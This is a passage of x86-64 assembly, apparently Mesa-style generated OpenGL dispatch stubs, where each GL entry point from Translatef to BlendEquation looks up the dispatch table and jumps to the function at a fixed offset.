movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2432(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Translatef), .-GL_PREFIX(Translatef)
.p2align 4,,15
.globl GL_PREFIX(Viewport)
.type GL_PREFIX(Viewport), @function
GL_PREFIX(Viewport):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2440(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Viewport), .-GL_PREFIX(Viewport)
.p2align 4,,15
.globl GL_PREFIX(ArrayElement)
.type GL_PREFIX(ArrayElement), @function
GL_PREFIX(ArrayElement):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2448(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ArrayElement), .-GL_PREFIX(ArrayElement)
.p2align 4,,15
.globl GL_PREFIX(BindTexture)
.type GL_PREFIX(BindTexture), @function
GL_PREFIX(BindTexture):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2456(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindTexture), .-GL_PREFIX(BindTexture)
.p2align 4,,15
.globl GL_PREFIX(ColorPointer)
.type GL_PREFIX(ColorPointer), @function
GL_PREFIX(ColorPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2464(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorPointer), .-GL_PREFIX(ColorPointer)
.p2align 4,,15
.globl GL_PREFIX(DisableClientState)
.type GL_PREFIX(DisableClientState), @function
GL_PREFIX(DisableClientState):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2472(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DisableClientState), .-GL_PREFIX(DisableClientState)
.p2align 4,,15
.globl GL_PREFIX(DrawArrays)
.type GL_PREFIX(DrawArrays), @function
GL_PREFIX(DrawArrays):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawArrays), .-GL_PREFIX(DrawArrays)
.p2align 4,,15
.globl GL_PREFIX(DrawElements)
.type GL_PREFIX(DrawElements), @function
GL_PREFIX(DrawElements):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawElements), .-GL_PREFIX(DrawElements)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlagPointer)
.type GL_PREFIX(EdgeFlagPointer), @function
GL_PREFIX(EdgeFlagPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlagPointer), .-GL_PREFIX(EdgeFlagPointer)
.p2align 4,,15
.globl GL_PREFIX(EnableClientState)
.type GL_PREFIX(EnableClientState), @function
GL_PREFIX(EnableClientState):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2504(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EnableClientState), .-GL_PREFIX(EnableClientState)
.p2align 4,,15
.globl GL_PREFIX(IndexPointer)
.type GL_PREFIX(IndexPointer), @function
GL_PREFIX(IndexPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2512(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IndexPointer), .-GL_PREFIX(IndexPointer)
.p2align 4,,15
.globl GL_PREFIX(Indexub)
.type GL_PREFIX(Indexub), @function
GL_PREFIX(Indexub):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2520(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexub), .-GL_PREFIX(Indexub)
.p2align 4,,15
.globl GL_PREFIX(Indexubv)
.type GL_PREFIX(Indexubv), @function
GL_PREFIX(Indexubv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2528(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexubv), .-GL_PREFIX(Indexubv)
.p2align 4,,15
.globl GL_PREFIX(InterleavedArrays)
.type GL_PREFIX(InterleavedArrays), @function
GL_PREFIX(InterleavedArrays):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(InterleavedArrays), .-GL_PREFIX(InterleavedArrays)
.p2align 4,,15
.globl GL_PREFIX(NormalPointer)
.type GL_PREFIX(NormalPointer), @function
GL_PREFIX(NormalPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(NormalPointer), .-GL_PREFIX(NormalPointer)
.p2align 4,,15
.globl GL_PREFIX(PolygonOffset)
.type GL_PREFIX(PolygonOffset), @function
GL_PREFIX(PolygonOffset):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2552(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 2552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PolygonOffset), .-GL_PREFIX(PolygonOffset)
.p2align 4,,15
.globl GL_PREFIX(TexCoordPointer)
.type GL_PREFIX(TexCoordPointer), @function
GL_PREFIX(TexCoordPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoordPointer), .-GL_PREFIX(TexCoordPointer)
.p2align 4,,15
.globl GL_PREFIX(VertexPointer)
.type GL_PREFIX(VertexPointer), @function
GL_PREFIX(VertexPointer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexPointer), .-GL_PREFIX(VertexPointer)
.p2align 4,,15
.globl GL_PREFIX(AreTexturesResident)
.type GL_PREFIX(AreTexturesResident), @function
GL_PREFIX(AreTexturesResident):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2576(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AreTexturesResident), .-GL_PREFIX(AreTexturesResident)
.p2align 4,,15
.globl GL_PREFIX(CopyTexImage1D)
.type GL_PREFIX(CopyTexImage1D), @function
GL_PREFIX(CopyTexImage1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyTexImage1D), .-GL_PREFIX(CopyTexImage1D)
.p2align 4,,15
.globl GL_PREFIX(CopyTexImage2D)
.type GL_PREFIX(CopyTexImage2D), @function
GL_PREFIX(CopyTexImage2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyTexImage2D), .-GL_PREFIX(CopyTexImage2D)
.p2align 4,,15
.globl GL_PREFIX(CopyTexSubImage1D)
.type GL_PREFIX(CopyTexSubImage1D), @function
GL_PREFIX(CopyTexSubImage1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyTexSubImage1D), .-GL_PREFIX(CopyTexSubImage1D)
.p2align 4,,15
.globl GL_PREFIX(CopyTexSubImage2D)
.type GL_PREFIX(CopyTexSubImage2D), @function
GL_PREFIX(CopyTexSubImage2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyTexSubImage2D), .-GL_PREFIX(CopyTexSubImage2D)
.p2align 4,,15
.globl GL_PREFIX(DeleteTextures)
.type GL_PREFIX(DeleteTextures), @function
GL_PREFIX(DeleteTextures):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteTextures), .-GL_PREFIX(DeleteTextures)
.p2align 4,,15
.globl GL_PREFIX(GenTextures)
.type GL_PREFIX(GenTextures), @function
GL_PREFIX(GenTextures):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2624(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenTextures), .-GL_PREFIX(GenTextures)
.p2align 4,,15
.globl GL_PREFIX(GetPointerv)
.type GL_PREFIX(GetPointerv), @function
GL_PREFIX(GetPointerv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPointerv), .-GL_PREFIX(GetPointerv)
.p2align 4,,15
.globl GL_PREFIX(IsTexture)
.type GL_PREFIX(IsTexture), @function
GL_PREFIX(IsTexture):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2640(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsTexture), .-GL_PREFIX(IsTexture)
.p2align 4,,15
.globl GL_PREFIX(PrioritizeTextures)
.type GL_PREFIX(PrioritizeTextures), @function
GL_PREFIX(PrioritizeTextures):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PrioritizeTextures), .-GL_PREFIX(PrioritizeTextures)
.p2align 4,,15
.globl GL_PREFIX(TexSubImage1D)
.type GL_PREFIX(TexSubImage1D), @function
GL_PREFIX(TexSubImage1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexSubImage1D), .-GL_PREFIX(TexSubImage1D)
.p2align 4,,15
.globl GL_PREFIX(TexSubImage2D)
.type GL_PREFIX(TexSubImage2D), @function
GL_PREFIX(TexSubImage2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexSubImage2D), .-GL_PREFIX(TexSubImage2D)
.p2align 4,,15
.globl GL_PREFIX(PopClientAttrib)
.type GL_PREFIX(PopClientAttrib), @function
GL_PREFIX(PopClientAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 2672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2672(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 2672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopClientAttrib), .-GL_PREFIX(PopClientAttrib)
.p2align 4,,15
.globl GL_PREFIX(PushClientAttrib)
.type GL_PREFIX(PushClientAttrib), @function
GL_PREFIX(PushClientAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2680(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushClientAttrib), .-GL_PREFIX(PushClientAttrib)
.p2align 4,,15
.globl GL_PREFIX(BlendColor)
.type GL_PREFIX(BlendColor), @function
GL_PREFIX(BlendColor):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2688(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BlendColor), .-GL_PREFIX(BlendColor)
.p2align 4,,15
.globl GL_PREFIX(BlendEquation)
.type GL_PREFIX(BlendEquation), @function
GL_PREFIX(BlendEquation):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2696(%rax), %r11
jmp *%r11
1:
pushq %rdi
